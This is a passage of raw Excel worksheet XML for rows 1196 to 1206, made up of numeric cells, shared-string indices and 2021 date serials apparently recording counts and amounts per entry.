      <c r="M1196">
        <v>0</v>
      </c>
      <c r="N1196">
        <v>0</v>
      </c>
      <c r="O1196">
        <v>0</v>
      </c>
      <c r="P1196">
        <v>0</v>
      </c>
      <c r="Q1196">
        <v>0</v>
      </c>
      <c r="R1196">
        <v>0</v>
      </c>
      <c r="S1196">
        <v>0</v>
      </c>
      <c r="T1196">
        <v>2</v>
      </c>
      <c r="U1196">
        <v>125000</v>
      </c>
      <c r="V1196">
        <v>0</v>
      </c>
      <c r="W1196">
        <v>65000</v>
      </c>
      <c r="X1196">
        <v>0</v>
      </c>
      <c r="Y1196">
        <v>0</v>
      </c>
      <c r="Z1196">
        <v>0</v>
      </c>
      <c r="AA1196">
        <v>0</v>
      </c>
      <c r="AB1196">
        <v>0</v>
      </c>
      <c r="AC1196">
        <v>0</v>
      </c>
      <c r="AD1196">
        <v>0</v>
      </c>
      <c r="AE1196">
        <v>60000</v>
      </c>
      <c r="AF1196" t="s">
        <v>3003</v>
      </c>
      <c r="AG1196">
        <v>95442</v>
      </c>
      <c r="AH1196">
        <v>29</v>
      </c>
      <c r="AJ1196">
        <v>383</v>
      </c>
      <c r="AK1196" t="s">
        <v>1963</v>
      </c>
      <c r="AL1196" t="s">
        <v>1964</v>
      </c>
      <c r="AM1196" t="s">
        <v>8943</v>
      </c>
      <c r="AN1196" t="s">
        <v>55</v>
      </c>
      <c r="AO1196">
        <v>2021</v>
      </c>
      <c r="AP1196" t="s">
        <v>8944</v>
      </c>
      <c r="AQ1196" t="s">
        <v>8945</v>
      </c>
      <c r="AR1196" t="s">
        <v>4171</v>
      </c>
      <c r="AS1196" t="s">
        <v>71</v>
      </c>
      <c r="AT1196" t="s">
        <v>58</v>
      </c>
      <c r="AU1196">
        <v>25</v>
      </c>
      <c r="AV1196">
        <v>1</v>
      </c>
      <c r="AW1196">
        <v>30</v>
      </c>
      <c r="AX1196">
        <v>20</v>
      </c>
      <c r="AY1196">
        <v>8</v>
      </c>
      <c r="AZ1196">
        <v>3</v>
      </c>
      <c r="BA1196" t="s">
        <v>16771</v>
      </c>
      <c r="BB1196">
        <v>0</v>
      </c>
      <c r="BC1196" t="s">
        <v>13508</v>
      </c>
      <c r="BD1196">
        <v>0</v>
      </c>
    </row>
    <row r="1197" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1197">
        <v>5507</v>
      </c>
      <c r="B1197" t="s">
        <v>8946</v>
      </c>
      <c r="C1197" t="s">
        <v>199</v>
      </c>
      <c r="D1197" t="s">
        <v>8947</v>
      </c>
      <c r="E1197" t="s">
        <v>111</v>
      </c>
      <c r="F1197" t="s">
        <v>8948</v>
      </c>
      <c r="G1197" s="1">
        <v>44323</v>
      </c>
      <c r="H1197">
        <v>10012</v>
      </c>
      <c r="I1197">
        <v>10012</v>
      </c>
      <c r="J1197">
        <v>2</v>
      </c>
      <c r="K1197">
        <v>1</v>
      </c>
      <c r="L1197">
        <v>2</v>
      </c>
      <c r="M1197">
        <v>0</v>
      </c>
      <c r="N1197">
        <v>0</v>
      </c>
      <c r="O1197">
        <v>0</v>
      </c>
      <c r="P1197">
        <v>0</v>
      </c>
      <c r="Q1197">
        <v>0</v>
      </c>
      <c r="R1197">
        <v>0</v>
      </c>
      <c r="S1197">
        <v>0</v>
      </c>
      <c r="T1197">
        <v>0</v>
      </c>
      <c r="U1197">
        <v>100000</v>
      </c>
      <c r="V1197">
        <v>5000</v>
      </c>
      <c r="W1197">
        <v>5000</v>
      </c>
      <c r="X1197">
        <v>0</v>
      </c>
      <c r="Y1197">
        <v>0</v>
      </c>
      <c r="Z1197">
        <v>0</v>
      </c>
      <c r="AA1197">
        <v>0</v>
      </c>
      <c r="AB1197">
        <v>0</v>
      </c>
      <c r="AC1197">
        <v>0</v>
      </c>
      <c r="AD1197">
        <v>0</v>
      </c>
      <c r="AE1197">
        <v>0</v>
      </c>
      <c r="AF1197" t="s">
        <v>8949</v>
      </c>
      <c r="AG1197">
        <v>23891</v>
      </c>
      <c r="AH1197">
        <v>1</v>
      </c>
      <c r="AJ1197">
        <v>1</v>
      </c>
      <c r="AK1197" t="s">
        <v>8950</v>
      </c>
      <c r="AL1197" t="s">
        <v>8951</v>
      </c>
      <c r="AM1197" t="s">
        <v>8952</v>
      </c>
      <c r="AN1197" t="s">
        <v>55</v>
      </c>
      <c r="AO1197">
        <v>2021</v>
      </c>
      <c r="AP1197">
        <v>82386101001</v>
      </c>
      <c r="AQ1197" t="s">
        <v>8953</v>
      </c>
      <c r="AR1197" t="s">
        <v>8949</v>
      </c>
      <c r="AS1197" t="s">
        <v>371</v>
      </c>
      <c r="AT1197" t="s">
        <v>72</v>
      </c>
      <c r="AU1197">
        <v>20</v>
      </c>
      <c r="AV1197">
        <v>0</v>
      </c>
      <c r="AW1197">
        <v>10</v>
      </c>
      <c r="AX1197">
        <v>0</v>
      </c>
      <c r="AY1197">
        <v>0</v>
      </c>
      <c r="AZ1197">
        <v>0</v>
      </c>
      <c r="BA1197" t="s">
        <v>16774</v>
      </c>
      <c r="BB1197" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1197" t="s">
        <v>9603</v>
      </c>
      <c r="BD1197">
        <v>0</v>
      </c>
    </row>
    <row r="1198" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1198">
        <v>5509</v>
      </c>
      <c r="B1198" t="s">
        <v>8954</v>
      </c>
      <c r="C1198" t="s">
        <v>318</v>
      </c>
      <c r="D1198" t="s">
        <v>8955</v>
      </c>
      <c r="E1198" t="s">
        <v>49</v>
      </c>
      <c r="F1198" t="s">
        <v>143</v>
      </c>
      <c r="G1198" s="1">
        <v>44316</v>
      </c>
      <c r="H1198">
        <v>10030</v>
      </c>
      <c r="I1198">
        <v>10030</v>
      </c>
      <c r="J1198">
        <v>0</v>
      </c>
      <c r="K1198">
        <v>0</v>
      </c>
      <c r="L1198">
        <v>0</v>
      </c>
      <c r="M1198">
        <v>0</v>
      </c>
      <c r="N1198">
        <v>0</v>
      </c>
      <c r="O1198">
        <v>0</v>
      </c>
      <c r="P1198">
        <v>0</v>
      </c>
      <c r="Q1198">
        <v>1</v>
      </c>
      <c r="R1198">
        <v>0</v>
      </c>
      <c r="S1198">
        <v>0</v>
      </c>
      <c r="T1198">
        <v>0</v>
      </c>
      <c r="U1198">
        <v>0</v>
      </c>
      <c r="V1198">
        <v>0</v>
      </c>
      <c r="W1198">
        <v>0</v>
      </c>
      <c r="X1198">
        <v>0</v>
      </c>
      <c r="Y1198">
        <v>0</v>
      </c>
      <c r="Z1198">
        <v>0</v>
      </c>
      <c r="AA1198">
        <v>0</v>
      </c>
      <c r="AB1198">
        <v>5</v>
      </c>
      <c r="AC1198">
        <v>0</v>
      </c>
      <c r="AD1198">
        <v>0</v>
      </c>
      <c r="AE1198">
        <v>0</v>
      </c>
      <c r="AF1198" t="s">
        <v>8956</v>
      </c>
      <c r="AG1198">
        <v>90242</v>
      </c>
      <c r="AH1198">
        <v>26</v>
      </c>
      <c r="AJ1198">
        <v>420</v>
      </c>
      <c r="AK1198" t="s">
        <v>331</v>
      </c>
      <c r="AL1198" t="s">
        <v>7662</v>
      </c>
      <c r="AM1198" t="s">
        <v>8957</v>
      </c>
      <c r="AN1198" t="s">
        <v>68</v>
      </c>
      <c r="AO1198">
        <v>2018</v>
      </c>
      <c r="AP1198">
        <v>8114167141</v>
      </c>
      <c r="AQ1198" t="s">
        <v>8958</v>
      </c>
      <c r="AR1198" t="s">
        <v>8959</v>
      </c>
      <c r="AS1198" t="s">
        <v>71</v>
      </c>
      <c r="AT1198" t="s">
        <v>72</v>
      </c>
      <c r="AU1198">
        <v>30</v>
      </c>
      <c r="AV1198">
        <v>0</v>
      </c>
      <c r="AW1198">
        <v>0</v>
      </c>
      <c r="AX1198">
        <v>0</v>
      </c>
      <c r="AY1198">
        <v>1</v>
      </c>
      <c r="AZ1198">
        <v>3</v>
      </c>
      <c r="BA1198" t="s">
        <v>17695</v>
      </c>
      <c r="BB1198" t="s">
        <v>16153</v>
      </c>
      <c r="BC1198" t="s">
        <v>9522</v>
      </c>
      <c r="BD1198">
        <v>0</v>
      </c>
    </row>
    <row r="1199" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1199">
        <v>5527</v>
      </c>
      <c r="B1199" t="s">
        <v>8960</v>
      </c>
      <c r="C1199" t="s">
        <v>215</v>
      </c>
      <c r="D1199" t="s">
        <v>8961</v>
      </c>
      <c r="E1199" t="s">
        <v>528</v>
      </c>
      <c r="F1199" t="s">
        <v>8962</v>
      </c>
      <c r="G1199" s="1">
        <v>44370</v>
      </c>
      <c r="H1199">
        <v>10100</v>
      </c>
      <c r="I1199">
        <v>10100</v>
      </c>
      <c r="J1199">
        <v>1</v>
      </c>
      <c r="K1199">
        <v>3</v>
      </c>
      <c r="L1199">
        <v>0</v>
      </c>
      <c r="M1199">
        <v>1</v>
      </c>
      <c r="N1199">
        <v>0</v>
      </c>
      <c r="O1199">
        <v>0</v>
      </c>
      <c r="P1199">
        <v>0</v>
      </c>
      <c r="Q1199">
        <v>2</v>
      </c>
      <c r="R1199">
        <v>0</v>
      </c>
      <c r="S1199">
        <v>0</v>
      </c>
      <c r="T1199">
        <v>1</v>
      </c>
      <c r="U1199">
        <v>0</v>
      </c>
      <c r="V1199">
        <v>250</v>
      </c>
      <c r="W1199">
        <v>0</v>
      </c>
      <c r="X1199">
        <v>250</v>
      </c>
      <c r="Y1199">
        <v>0</v>
      </c>
      <c r="Z1199">
        <v>0</v>
      </c>
      <c r="AA1199">
        <v>0</v>
      </c>
      <c r="AB1199">
        <v>0</v>
      </c>
      <c r="AC1199">
        <v>0</v>
      </c>
      <c r="AD1199">
        <v>0</v>
      </c>
      <c r="AE1199">
        <v>500</v>
      </c>
      <c r="AF1199" t="s">
        <v>8963</v>
      </c>
      <c r="AG1199">
        <v>33211</v>
      </c>
      <c r="AH1199">
        <v>6</v>
      </c>
      <c r="AJ1199">
        <v>141</v>
      </c>
      <c r="AK1199" t="s">
        <v>8964</v>
      </c>
      <c r="AL1199" t="s">
        <v>8964</v>
      </c>
      <c r="AM1199" t="s">
        <v>8965</v>
      </c>
      <c r="AN1199" t="s">
        <v>68</v>
      </c>
      <c r="AO1199">
        <v>2006</v>
      </c>
      <c r="AP1199">
        <v>82278798127</v>
      </c>
      <c r="AQ1199">
        <v>82278798127</v>
      </c>
      <c r="AR1199" t="s">
        <v>8963</v>
      </c>
      <c r="AS1199" t="s">
        <v>71</v>
      </c>
      <c r="AT1199" t="s">
        <v>72</v>
      </c>
      <c r="AU1199">
        <v>5</v>
      </c>
      <c r="AV1199">
        <v>0</v>
      </c>
      <c r="AW1199">
        <v>1</v>
      </c>
      <c r="AX1199">
        <v>3</v>
      </c>
      <c r="AY1199">
        <v>2</v>
      </c>
      <c r="AZ1199">
        <v>4</v>
      </c>
      <c r="BA1199" t="s">
        <v>17698</v>
      </c>
      <c r="BB1199">
        <v>0</v>
      </c>
      <c r="BC1199" t="s">
        <v>14064</v>
      </c>
      <c r="BD1199">
        <v>0</v>
      </c>
    </row>
    <row r="1200" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1200">
        <v>5535</v>
      </c>
      <c r="B1200" t="s">
        <v>4000</v>
      </c>
      <c r="C1200" t="s">
        <v>88</v>
      </c>
      <c r="D1200" t="s">
        <v>8966</v>
      </c>
      <c r="E1200" t="s">
        <v>300</v>
      </c>
      <c r="F1200" t="s">
        <v>8967</v>
      </c>
      <c r="G1200" s="1">
        <v>44292</v>
      </c>
      <c r="H1200">
        <v>10123</v>
      </c>
      <c r="I1200">
        <v>10123</v>
      </c>
      <c r="J1200">
        <v>1</v>
      </c>
      <c r="K1200">
        <v>1</v>
      </c>
      <c r="L1200">
        <v>1</v>
      </c>
      <c r="M1200">
        <v>2</v>
      </c>
      <c r="N1200">
        <v>0</v>
      </c>
      <c r="O1200">
        <v>0</v>
      </c>
      <c r="P1200">
        <v>0</v>
      </c>
      <c r="Q1200">
        <v>2</v>
      </c>
      <c r="R1200">
        <v>3</v>
      </c>
      <c r="S1200">
        <v>0</v>
      </c>
      <c r="T1200">
        <v>0</v>
      </c>
      <c r="U1200">
        <v>30000</v>
      </c>
      <c r="V1200">
        <v>20000</v>
      </c>
      <c r="W1200">
        <v>10000</v>
      </c>
      <c r="X1200">
        <v>3000</v>
      </c>
      <c r="Y1200">
        <v>0</v>
      </c>
      <c r="Z1200">
        <v>0</v>
      </c>
      <c r="AA1200">
        <v>0</v>
      </c>
      <c r="AB1200">
        <v>2000</v>
      </c>
      <c r="AC1200">
        <v>3000</v>
      </c>
      <c r="AD1200">
        <v>0</v>
      </c>
      <c r="AE1200">
        <v>0</v>
      </c>
      <c r="AF1200" t="s">
        <v>5959</v>
      </c>
      <c r="AG1200">
        <v>80222</v>
      </c>
      <c r="AH1200">
        <v>17</v>
      </c>
      <c r="AJ1200">
        <v>282</v>
      </c>
      <c r="AK1200" t="s">
        <v>592</v>
      </c>
      <c r="AL1200" t="s">
        <v>593</v>
      </c>
      <c r="AM1200" t="s">
        <v>8968</v>
      </c>
      <c r="AN1200" t="s">
        <v>55</v>
      </c>
      <c r="AO1200">
        <v>2015</v>
      </c>
      <c r="AP1200" t="s">
        <v>8969</v>
      </c>
      <c r="AQ1200" t="s">
        <v>5964</v>
      </c>
      <c r="AR1200" t="s">
        <v>5965</v>
      </c>
      <c r="AS1200" t="s">
        <v>71</v>
      </c>
      <c r="AT1200" t="s">
        <v>58</v>
      </c>
      <c r="AU1200">
        <v>24</v>
      </c>
      <c r="AV1200">
        <v>1</v>
      </c>
      <c r="AW1200">
        <v>0</v>
      </c>
      <c r="AX1200">
        <v>0</v>
      </c>
      <c r="AY1200">
        <v>20</v>
      </c>
      <c r="AZ1200">
        <v>4</v>
      </c>
      <c r="BA1200" t="s">
        <v>16863</v>
      </c>
      <c r="BB1200" t="s">
        <v>16154</v>
      </c>
      <c r="BC1200" t="s">
        <v>12942</v>
      </c>
      <c r="BD1200" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="1201" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1201">
        <v>5543</v>
      </c>
      <c r="B1201" t="s">
        <v>2621</v>
      </c>
      <c r="C1201" t="s">
        <v>99</v>
      </c>
      <c r="D1201" t="s">
        <v>8970</v>
      </c>
      <c r="E1201" t="s">
        <v>111</v>
      </c>
      <c r="F1201" t="s">
        <v>8971</v>
      </c>
      <c r="G1201" s="1">
        <v>44337</v>
      </c>
      <c r="H1201">
        <v>10147</v>
      </c>
      <c r="I1201">
        <v>10147</v>
      </c>
      <c r="J1201">
        <v>2</v>
      </c>
      <c r="K1201">
        <v>1</v>
      </c>
      <c r="L1201">
        <v>1</v>
      </c>
      <c r="M1201">
        <v>0</v>
      </c>
      <c r="N1201">
        <v>0</v>
      </c>
      <c r="O1201">
        <v>0</v>
      </c>
      <c r="P1201">
        <v>0</v>
      </c>
      <c r="Q1201">
        <v>0</v>
      </c>
      <c r="R1201">
        <v>2</v>
      </c>
      <c r="S1201">
        <v>0</v>
      </c>
      <c r="T1201">
        <v>0</v>
      </c>
      <c r="U1201">
        <v>50000</v>
      </c>
      <c r="V1201">
        <v>2000</v>
      </c>
      <c r="W1201">
        <v>2000</v>
      </c>
      <c r="X1201">
        <v>0</v>
      </c>
      <c r="Y1201">
        <v>0</v>
      </c>
      <c r="Z1201">
        <v>0</v>
      </c>
      <c r="AA1201">
        <v>0</v>
      </c>
      <c r="AB1201">
        <v>0</v>
      </c>
      <c r="AC1201">
        <v>1000</v>
      </c>
      <c r="AD1201">
        <v>0</v>
      </c>
      <c r="AE1201">
        <v>0</v>
      </c>
      <c r="AF1201" t="s">
        <v>5591</v>
      </c>
      <c r="AG1201">
        <v>14440</v>
      </c>
      <c r="AH1201">
        <v>12</v>
      </c>
      <c r="AJ1201">
        <v>160</v>
      </c>
      <c r="AK1201" t="s">
        <v>114</v>
      </c>
      <c r="AL1201" t="s">
        <v>114</v>
      </c>
      <c r="AM1201" t="s">
        <v>8972</v>
      </c>
      <c r="AN1201" t="s">
        <v>55</v>
      </c>
      <c r="AO1201">
        <v>1994</v>
      </c>
      <c r="AP1201" t="s">
        <v>8973</v>
      </c>
      <c r="AQ1201" t="s">
        <v>8974</v>
      </c>
      <c r="AR1201" t="s">
        <v>5591</v>
      </c>
      <c r="AS1201" t="s">
        <v>71</v>
      </c>
      <c r="AT1201" t="s">
        <v>58</v>
      </c>
      <c r="AU1201">
        <v>6</v>
      </c>
      <c r="AV1201">
        <v>1</v>
      </c>
      <c r="AW1201">
        <v>21</v>
      </c>
      <c r="AX1201">
        <v>25</v>
      </c>
      <c r="AY1201">
        <v>11</v>
      </c>
      <c r="AZ1201">
        <v>19</v>
      </c>
      <c r="BA1201" t="s">
        <v>17151</v>
      </c>
      <c r="BB1201">
        <v>0</v>
      </c>
      <c r="BC1201">
        <v>0</v>
      </c>
      <c r="BD1201" t="s">
        <v>13702</v>
      </c>
    </row>
    <row r="1202" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1202">
        <v>5523</v>
      </c>
      <c r="B1202" t="s">
        <v>2152</v>
      </c>
      <c r="C1202" t="s">
        <v>129</v>
      </c>
      <c r="D1202" t="s">
        <v>8975</v>
      </c>
      <c r="E1202" t="s">
        <v>300</v>
      </c>
      <c r="F1202" t="s">
        <v>8976</v>
      </c>
      <c r="G1202" s="1">
        <v>44355</v>
      </c>
      <c r="H1202">
        <v>10162</v>
      </c>
      <c r="I1202">
        <v>10162</v>
      </c>
      <c r="J1202">
        <v>2</v>
      </c>
      <c r="K1202">
        <v>0</v>
      </c>
      <c r="L1202">
        <v>0</v>
      </c>
      <c r="M1202">
        <v>0</v>
      </c>
      <c r="N1202">
        <v>0</v>
      </c>
      <c r="O1202">
        <v>0</v>
      </c>
      <c r="P1202">
        <v>0</v>
      </c>
      <c r="Q1202">
        <v>0</v>
      </c>
      <c r="R1202">
        <v>0</v>
      </c>
      <c r="S1202">
        <v>1</v>
      </c>
      <c r="T1202">
        <v>0</v>
      </c>
      <c r="U1202">
        <v>396</v>
      </c>
      <c r="V1202">
        <v>0</v>
      </c>
      <c r="W1202">
        <v>0</v>
      </c>
      <c r="X1202">
        <v>0</v>
      </c>
      <c r="Y1202">
        <v>0</v>
      </c>
      <c r="Z1202">
        <v>0</v>
      </c>
      <c r="AA1202">
        <v>0</v>
      </c>
      <c r="AB1202">
        <v>0</v>
      </c>
      <c r="AC1202">
        <v>0</v>
      </c>
      <c r="AD1202">
        <v>0</v>
      </c>
      <c r="AE1202">
        <v>0</v>
      </c>
      <c r="AF1202" t="s">
        <v>2146</v>
      </c>
      <c r="AG1202">
        <v>15721</v>
      </c>
      <c r="AH1202">
        <v>11</v>
      </c>
      <c r="AJ1202">
        <v>268</v>
      </c>
      <c r="AK1202" t="s">
        <v>4981</v>
      </c>
      <c r="AL1202" t="s">
        <v>6052</v>
      </c>
      <c r="AM1202" t="s">
        <v>8977</v>
      </c>
      <c r="AN1202" t="s">
        <v>55</v>
      </c>
      <c r="AO1202">
        <v>2021</v>
      </c>
      <c r="AP1202">
        <v>81318387798</v>
      </c>
      <c r="AQ1202" t="s">
        <v>8978</v>
      </c>
      <c r="AR1202" t="s">
        <v>8979</v>
      </c>
      <c r="AS1202" t="s">
        <v>179</v>
      </c>
      <c r="AT1202" t="s">
        <v>72</v>
      </c>
      <c r="AU1202">
        <v>25</v>
      </c>
      <c r="AV1202">
        <v>1</v>
      </c>
      <c r="AW1202">
        <v>0</v>
      </c>
      <c r="AX1202">
        <v>0</v>
      </c>
      <c r="AY1202">
        <v>3</v>
      </c>
      <c r="AZ1202">
        <v>2</v>
      </c>
      <c r="BA1202" t="s">
        <v>16595</v>
      </c>
      <c r="BB1202">
        <v>0</v>
      </c>
      <c r="BC1202" t="s">
        <v>13511</v>
      </c>
      <c r="BD1202">
        <v>0</v>
      </c>
    </row>
    <row r="1203" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1203">
        <v>5570</v>
      </c>
      <c r="B1203" t="s">
        <v>8980</v>
      </c>
      <c r="C1203" t="s">
        <v>318</v>
      </c>
      <c r="D1203" t="s">
        <v>8981</v>
      </c>
      <c r="E1203" t="s">
        <v>142</v>
      </c>
      <c r="F1203" t="s">
        <v>151</v>
      </c>
      <c r="G1203" s="1">
        <v>44358</v>
      </c>
      <c r="H1203">
        <v>10295</v>
      </c>
      <c r="I1203">
        <v>10295</v>
      </c>
      <c r="J1203">
        <v>0</v>
      </c>
      <c r="K1203">
        <v>0</v>
      </c>
      <c r="L1203">
        <v>1</v>
      </c>
      <c r="M1203">
        <v>0</v>
      </c>
      <c r="N1203">
        <v>0</v>
      </c>
      <c r="O1203">
        <v>0</v>
      </c>
      <c r="P1203">
        <v>0</v>
      </c>
      <c r="Q1203">
        <v>0</v>
      </c>
      <c r="R1203">
        <v>0</v>
      </c>
      <c r="S1203">
        <v>0</v>
      </c>
      <c r="T1203">
        <v>0</v>
      </c>
      <c r="U1203">
        <v>0</v>
      </c>
      <c r="V1203">
        <v>0</v>
      </c>
      <c r="W1203">
        <v>1000</v>
      </c>
      <c r="X1203">
        <v>0</v>
      </c>
      <c r="Y1203">
        <v>0</v>
      </c>
      <c r="Z1203">
        <v>0</v>
      </c>
      <c r="AA1203">
        <v>0</v>
      </c>
      <c r="AB1203">
        <v>0</v>
      </c>
      <c r="AC1203">
        <v>0</v>
      </c>
      <c r="AD1203">
        <v>0</v>
      </c>
      <c r="AE1203">
        <v>0</v>
      </c>
      <c r="AF1203" t="s">
        <v>8982</v>
      </c>
      <c r="AG1203">
        <v>90241</v>
      </c>
      <c r="AH1203">
        <v>26</v>
      </c>
      <c r="AJ1203">
        <v>420</v>
      </c>
      <c r="AK1203" t="s">
        <v>331</v>
      </c>
      <c r="AL1203" t="s">
        <v>332</v>
      </c>
      <c r="AM1203" t="s">
        <v>8983</v>
      </c>
      <c r="AN1203" t="s">
        <v>55</v>
      </c>
      <c r="AO1203">
        <v>2019</v>
      </c>
      <c r="AP1203" t="s">
        <v>8984</v>
      </c>
      <c r="AQ1203">
        <v>811441404</v>
      </c>
      <c r="AR1203" t="s">
        <v>8985</v>
      </c>
      <c r="AS1203" t="s">
        <v>71</v>
      </c>
      <c r="AT1203" t="s">
        <v>58</v>
      </c>
      <c r="AU1203">
        <v>6</v>
      </c>
      <c r="AV1203">
        <v>1</v>
      </c>
      <c r="AW1203">
        <v>0</v>
      </c>
      <c r="AX1203">
        <v>0</v>
      </c>
      <c r="AY1203">
        <v>10</v>
      </c>
      <c r="AZ1203">
        <v>5</v>
      </c>
      <c r="BA1203" t="s">
        <v>17703</v>
      </c>
      <c r="BB1203" t="s">
        <v>16160</v>
      </c>
      <c r="BC1203" t="s">
        <v>13641</v>
      </c>
      <c r="BD1203">
        <v>0</v>
      </c>
    </row>
    <row r="1204" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1204">
        <v>5540</v>
      </c>
      <c r="B1204" t="s">
        <v>8986</v>
      </c>
      <c r="C1204" t="s">
        <v>99</v>
      </c>
      <c r="D1204" t="s">
        <v>8987</v>
      </c>
      <c r="E1204" t="s">
        <v>363</v>
      </c>
      <c r="F1204" t="s">
        <v>764</v>
      </c>
      <c r="G1204" s="1">
        <v>44312</v>
      </c>
      <c r="H1204">
        <v>10303</v>
      </c>
      <c r="I1204">
        <v>10303</v>
      </c>
      <c r="J1204">
        <v>0</v>
      </c>
      <c r="K1204">
        <v>2</v>
      </c>
      <c r="L1204">
        <v>0</v>
      </c>
      <c r="M1204">
        <v>0</v>
      </c>
      <c r="N1204">
        <v>0</v>
      </c>
      <c r="O1204">
        <v>0</v>
      </c>
      <c r="P1204">
        <v>0</v>
      </c>
      <c r="Q1204">
        <v>0</v>
      </c>
      <c r="R1204">
        <v>0</v>
      </c>
      <c r="S1204">
        <v>0</v>
      </c>
      <c r="T1204">
        <v>2</v>
      </c>
      <c r="U1204">
        <v>0</v>
      </c>
      <c r="V1204">
        <v>600000</v>
      </c>
      <c r="W1204">
        <v>0</v>
      </c>
      <c r="X1204">
        <v>0</v>
      </c>
      <c r="Y1204">
        <v>0</v>
      </c>
      <c r="Z1204">
        <v>0</v>
      </c>
      <c r="AA1204">
        <v>0</v>
      </c>
      <c r="AB1204">
        <v>0</v>
      </c>
      <c r="AC1204">
        <v>0</v>
      </c>
      <c r="AD1204">
        <v>0</v>
      </c>
      <c r="AE1204">
        <v>1500000</v>
      </c>
      <c r="AF1204" t="s">
        <v>2296</v>
      </c>
      <c r="AG1204">
        <v>11720</v>
      </c>
      <c r="AH1204">
        <v>12</v>
      </c>
      <c r="AJ1204">
        <v>160</v>
      </c>
      <c r="AK1204" t="s">
        <v>405</v>
      </c>
      <c r="AL1204" t="s">
        <v>766</v>
      </c>
      <c r="AM1204" t="s">
        <v>8988</v>
      </c>
      <c r="AN1204" t="s">
        <v>55</v>
      </c>
      <c r="AO1204">
        <v>2013</v>
      </c>
      <c r="AP1204" t="s">
        <v>2298</v>
      </c>
      <c r="AQ1204" t="s">
        <v>2299</v>
      </c>
      <c r="AR1204" t="s">
        <v>2300</v>
      </c>
      <c r="AS1204" t="s">
        <v>179</v>
      </c>
      <c r="AT1204" t="s">
        <v>58</v>
      </c>
      <c r="AU1204">
        <v>0</v>
      </c>
      <c r="AV1204">
        <v>0</v>
      </c>
      <c r="AW1204">
        <v>0</v>
      </c>
      <c r="AX1204">
        <v>0</v>
      </c>
      <c r="AY1204">
        <v>40</v>
      </c>
      <c r="AZ1204">
        <v>0</v>
      </c>
      <c r="BA1204" t="s">
        <v>16589</v>
      </c>
      <c r="BB1204">
        <v>0</v>
      </c>
      <c r="BC1204" t="s">
        <v>13639</v>
      </c>
      <c r="BD1204">
        <v>0</v>
      </c>
    </row>
    <row r="1205" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1205">
        <v>5554</v>
      </c>
      <c r="B1205" t="s">
        <v>5245</v>
      </c>
      <c r="C1205" t="s">
        <v>318</v>
      </c>
      <c r="D1205" t="s">
        <v>8989</v>
      </c>
      <c r="E1205" t="s">
        <v>363</v>
      </c>
      <c r="F1205" t="s">
        <v>364</v>
      </c>
      <c r="G1205" s="1">
        <v>44368</v>
      </c>
      <c r="H1205">
        <v>10328</v>
      </c>
      <c r="I1205">
        <v>10328</v>
      </c>
      <c r="J1205">
        <v>0</v>
      </c>
      <c r="K1205">
        <v>0</v>
      </c>
      <c r="L1205">
        <v>0</v>
      </c>
      <c r="M1205">
        <v>0</v>
      </c>
      <c r="N1205">
        <v>0</v>
      </c>
      <c r="O1205">
        <v>0</v>
      </c>
      <c r="P1205">
        <v>0</v>
      </c>
      <c r="Q1205">
        <v>0</v>
      </c>
      <c r="R1205">
        <v>0</v>
      </c>
      <c r="S1205">
        <v>0</v>
      </c>
      <c r="T1205">
        <v>1</v>
      </c>
      <c r="U1205">
        <v>0</v>
      </c>
      <c r="V1205">
        <v>0</v>
      </c>
      <c r="W1205">
        <v>0</v>
      </c>
      <c r="X1205">
        <v>0</v>
      </c>
      <c r="Y1205">
        <v>0</v>
      </c>
      <c r="Z1205">
        <v>0</v>
      </c>
      <c r="AA1205">
        <v>0</v>
      </c>
      <c r="AB1205">
        <v>0</v>
      </c>
      <c r="AC1205">
        <v>0</v>
      </c>
      <c r="AD1205">
        <v>0</v>
      </c>
      <c r="AE1205">
        <v>500000</v>
      </c>
      <c r="AF1205" t="s">
        <v>5247</v>
      </c>
      <c r="AG1205">
        <v>90245</v>
      </c>
      <c r="AH1205">
        <v>26</v>
      </c>
      <c r="AJ1205">
        <v>420</v>
      </c>
      <c r="AK1205" t="s">
        <v>936</v>
      </c>
      <c r="AL1205" t="s">
        <v>5112</v>
      </c>
      <c r="AM1205" t="s">
        <v>8990</v>
      </c>
      <c r="AN1205" t="s">
        <v>55</v>
      </c>
      <c r="AO1205">
        <v>2011</v>
      </c>
      <c r="AP1205">
        <v>81354889123</v>
      </c>
      <c r="AQ1205" t="s">
        <v>8991</v>
      </c>
      <c r="AR1205" t="s">
        <v>5247</v>
      </c>
      <c r="AS1205" t="s">
        <v>371</v>
      </c>
      <c r="AT1205" t="s">
        <v>58</v>
      </c>
      <c r="AU1205">
        <v>26</v>
      </c>
      <c r="AV1205">
        <v>1</v>
      </c>
      <c r="AW1205">
        <v>5</v>
      </c>
      <c r="AX1205">
        <v>0</v>
      </c>
      <c r="AY1205">
        <v>9</v>
      </c>
      <c r="AZ1205">
        <v>2</v>
      </c>
      <c r="BA1205" t="s">
        <v>16975</v>
      </c>
      <c r="BB1205" t="s">
        <v>17701</v>
      </c>
      <c r="BC1205">
        <v>0</v>
      </c>
      <c r="BD1205" t="s">
        <v>13678</v>
      </c>
    </row>
    <row r="1206" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1206">
        <v>5561</v>
      </c>
      <c r="B1206" t="s">
        <v>8992</v>
      </c>
      <c r="C1206" t="s">
        <v>318</v>
      </c>
      <c r="D1206" t="s">
        <v>8993</v>
      </c>
      <c r="E1206" t="s">
        <v>142</v>
      </c>
      <c r="F1206" t="s">
        <v>7444</v>
      </c>
      <c r="G1206" s="1">
        <v>44314</v>
      </c>
      <c r="H1206">
        <v>10364</v>
      </c>
      <c r="I1206">
        <v>10364</v>
      </c>
      <c r="J1206">
        <v>1</v>
      </c>
      <c r="K1206">
        <v>0</v>
      </c>
      <c r="L1206">
        <v>3</v>
      </c>
      <c r="M1206">
        <v>0</v>
      </c>
      <c r="N1206">
        <v>0</v>
      </c>
      <c r="O1206">
        <v>0</v>
      </c>
      <c r="P1206">
        <v>0</v>
      </c>
      <c r="Q1206">
        <v>2</v>
      </c>
      <c r="R1206">
        <v>50</v>
      </c>
      <c r="S1206">
        <v>0</v>
